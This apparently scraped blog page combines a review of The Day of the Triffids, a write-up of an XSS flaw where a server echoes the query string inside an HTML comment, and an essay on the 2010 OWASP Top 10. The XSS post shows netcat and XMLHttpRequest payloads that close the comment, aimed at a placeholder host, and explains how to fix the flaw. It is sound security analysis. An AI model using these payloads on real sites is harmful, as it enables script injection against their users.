-
When a day that you happen to know is Wednesday starts off by sounding like Sunday, there is something seriously wrong somewhere.
Bill Masen’s day only worsens as he tries to survive the apocalyptic onslaught of ambling, venomous plants.
John Wyndham’s The Day of the Triffids doesn’t feel like an outdated menace even though the book was published in 1951.
It starts as the main character, Bill Masen, awakens in a hospital with his eyes covered in bandages. It’s a great hook that leads to a brief history of the triffids while also establishing an unease from the start. The movie 28 Days Later uses an almost identical method to bring both the character and audience into the action.
I love these sorts of stories. Where Cormac McCarthy’s The Road focuses on the harshness of personal survival and meaning after an apocalypse, Triffids considers how a society might try to emerge from one.
The 1981 BBC series stays very close the book’s plot and pacing. Read the book first, as the time-capsule aspect of the mini-series might distract you – 80s hair styles, clunky control panels, and lens flares.
But if you’re a sci-fi fan who’s been devoted to Doctor Who since the Tom Baker era (or before), you’ll feel right at home in the BBC’s adaptation.
• • • -
Here’s a case where a page has one of the simplest types of XSS vulns: A server echoes the querystring verbatim in the HTTP response. The payload shows up inside an HTML comment labeled “Request Query String”. The site’s developers claim the comment prevents XSS because browsers will not execute the JavaScript, as below:
<!-- _not gonna' happen_ -->
One exploit technique would be to terminate the comment opener with “ –>” (space dash dash >). Use netcat to make the raw HTTP request (for some reason, though likely related to the space, the server doubles the payload1):
$ echo -e "GET /nexistepas.cgi? --> HTTP/1.0\r\nHost: vuln.site\r\n" | nc vuln.site 80 | tee response.html ... <!-- === Request URI: /abc/def/error/404.jsp --> <!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false& --> --> --> <!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp --> ...
You can confirm this works by viewing the HTML source in Mozilla to see its syntax highlighting pick up the tags (yes, you could just as easily pop an alert window).
The server is clearly vulnerable to XSS because it renders the exact payload. The HTML comments were a poor countermeasure because they could be easily closed by including a few extra characters in the payload. This also shows why I prefer the term HTML injection since it describes the underlying effect more comprehensively.
However, there’s a major problem of effective exploitability: The attack uses illegal HTTP syntax.2 Though the payload works when sent with netcat, a browser applies URL encoding to the payload’s important characters, thereby rendering the it ineffective because the payload loses the literal characters necessary to modify the HTML:
https://vuln.site/nexistepas.cgi? --> ... <!-- === Request URI: /abc/def/error/404.jsp --> <!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false&%20--%3e%3cscript%3e%3c/script%3e --> <!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp --> ...
I tried Mozilla’s XMLHttpRequest object to see if it might subvert the encoding issue, but didn’t have any luck. Browsers are smart enough to apply URL encoding for all requests, thus defeating this possible trick:
var req = new XMLHttpRequest(); req.open('GET', 'https://vuln.site/nexistepas.cgi? --><scri' + 'pt></s' + 'cript>', false); req.send(null); ...
The developers are correct to claim that HTML comments prevent
<script>
tags from being executed, but that has nothing to do with protecting this web site. It’s like saying you can escape Daleks by using the stairs; they’ll just level the building.The page’s only protection comes from the fact that browsers will always encode the space character. If the page were to decode percent-encoded characters or there was a way to make the raw request with a space, then the page would be trivially exploited. The real solution for this vuln is to apply HTML encoding or percent encoding to the querystring when it’s written to the page.
Set aside whether the vuln is exploitable or not. The 404 message in this situation clearly has a bug. Bugs should be fixed.
The time spent arguing over risks, threats, and feasibility far outweighs the time required to create a patch. If the effort of pushing out a few lines of code cripples your development process, then it’s probably a better idea to put more effort into figuring out why the process is broken.
Notice that I didn’t mention the timeline for the patch. The release cycle might require a few days or a few weeks to validate the change. On the other hand, if minor changes cause panic about uptime and require months to test and apply, then you don’t have a good development process – and that’s something far more hazardous to the app’s long-term security.
-
Weird behavior like this is always interesting. Why would the querystring be repeated? What implications does this have for other types of attacks? ↩
-
Section 5.1 of RFC 2616 specifies the format of a request line must be as follows (SP indicates whitespace characters):
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Including spurious space characters within the request line might elicit errors from the web server and is a worthy test case, but you’ll be hard-pressed to convince a standards-conformant browser to include a space in the URI. ↩
• • • -
-
One curious point about the new 2010 OWASP Top 10 Application Security Risks is that only 3 of them aren’t common. The “Weakness Prevalence” for each of Insecure Cryptographic Storage (A7), Failure to Restrict URL Access (A8), and Unvalidated Redirects and Forwards (A10) is rated uncommon. That doesn’t mean that an uncommon risk can’t be a critical one. These three items highlight the challenge of producing a list with risks that often lack context.
Risk is difficult to quantify. The OWASP Top 10 includes a What’s My Risk? section with guidance on how to interpret the list. That guidance is based on the experience of people who perform penetration tests, code reviews, and research web security.
The Top 10 rates Insecure Cryptographic Storage (A7) as an uncommon prevalence and difficult to detect. One of the reasons it’s hard to detect is that datastores can’t be reviewed by external scanners nor can source code scanners identify these problems other than by indicating misuse of a language’s crypto functions. Thus, one interpretation is that insecure crypto is uncommon because more people haven’t discovered such problems. Yet not salting a password hash is one of the most egregious mistakes a dev can make while also being one of the easier problems to fix. The practice of salting password hashes has been around since Unix epoch time was in single digits.
It’s also interesting that insecure crypto is the only one on the list that’s rated difficult to detect. Conversely, Cross-Site Scripting (A2) is “very widespread” and “easy” to detect. But maybe it’s very widespread because it’s so trivial to find. People might simply choose to search for vulns that require minimal tools and skill to identify. On the other hand, XSS might be very widespread because it’s not easy to find in a way that scales with large apps or complex workflows in apps. Of course, this also assumes someone’s looking for it in the first place.
Broken Authentication and Session Management (A3) covers brute force attacks against login pages. It’s an item whose risk is too-often demonstrated by real-world attacks. In 2010 the Apache Foundation suffered an attack that relied on brute forcing a password. Apache’s network had a similar password-related intrusion in 2001. (I mention these because of the clarity of their postmortems, not to insinuate that the Apache foundation inherently insecure.) In 2009, another password guesser found happiness with Twitter.
Knowing an account’s password is the best way to steal a user’s data and gain unauthorized access to a site. The only markers for an attacker using valid credentials are behavioral patterns -– time of day, duration of activity, geographic source of the connection, and so on. The attacker doesn’t have to use any malicious characters or techniques like those that needed for XSS or SQL injection.
The impact of a compromised password is similar to how CSRF (A5) works. The nature of a CRSF attack is to force a victim’s browser to make a request to the target app using the context of the victim’s authenticated session. For example, a CSRF attack might change the victim’s password to a value chosen by the attacker, or update the victim’s email to one owned by the attacker.
By design, browsers make many requests without direct interaction from a user, such as loading images, CSS, JavaScript, and iframes. CSRF requires the victim’s browser to visit a booby-trapped page, but doesn’t require the victim to interact with that page. The target web app neither sees the attacker’s traffic nor even suspects the attacker’s activity because all of the interaction occurs between the victim’s browser and the app.
CSRF serves as a good example of the changing nature of the web security industry. CSRF vulns have existed as long as the web. The attack takes advantage of the fundamental nature of HTML and HTTP whereby browsers automatically load certain types of resources. Importantly, the attack just needs to build a request. It doesn’t need to read a response. It isn’t inhibited by the Same Origin Policy.
CSRF hopped on the Top 10 list’s revision in 2007, four years after the list’s first appearance. It’s doubtful that CSRF vulns were any more or less prevalent over that four year period. Its inclusion was due to having a better understanding of the vuln and appreciation of its potential impacts. It has a risk that’s likely to increase when the pool of victims can be measured in the hundreds of millions rather than the hundreds of thousands.
This vuln also highlights an observation bias of appsec. Now that CSRF is in vogue people start to look for it everywhere. Security conferences get more presentations about advanced ways to exploit it, even though real-world attackers seem fine with the succes of guessing passwords, seeding web pages with malware, and phishing.
A knowledgeable or dedicated attacker will find a useful exploit. Risk can include many factors, including Threat Agents (to use the Top 10’s term). Risk increases under a targeted attack – someone actively looking to compromise the app or its users’ data. If you want to add an “Exploitability” metric to your risk estimate, keep in mind that ease of exploitability is often related to the threat agent and tends to be a step function. It might be hard to craft an exploit in the first place, but anyone can run a 42-line Python script that automates an attack.
That’s partially why the Top 10 list should be a starting point to defining security practices for your app, but it shouldn’t be the end of the road. Even the OWASP site warns readers against using the list for policy rather than awareness. If you’ve been worried about information leakage and improper error handling since 2007, don’t think the problem has disappeared because it’s not on the list in 2010.
If you’ve been worried about how to build a secure app, don’t rely on the OWASP Top 10 – it’ll tell you weaknesses to avoid, but falls short on patterns to create.
For more about the OWASP Top 10’s history and possible future, check out this article.
• • •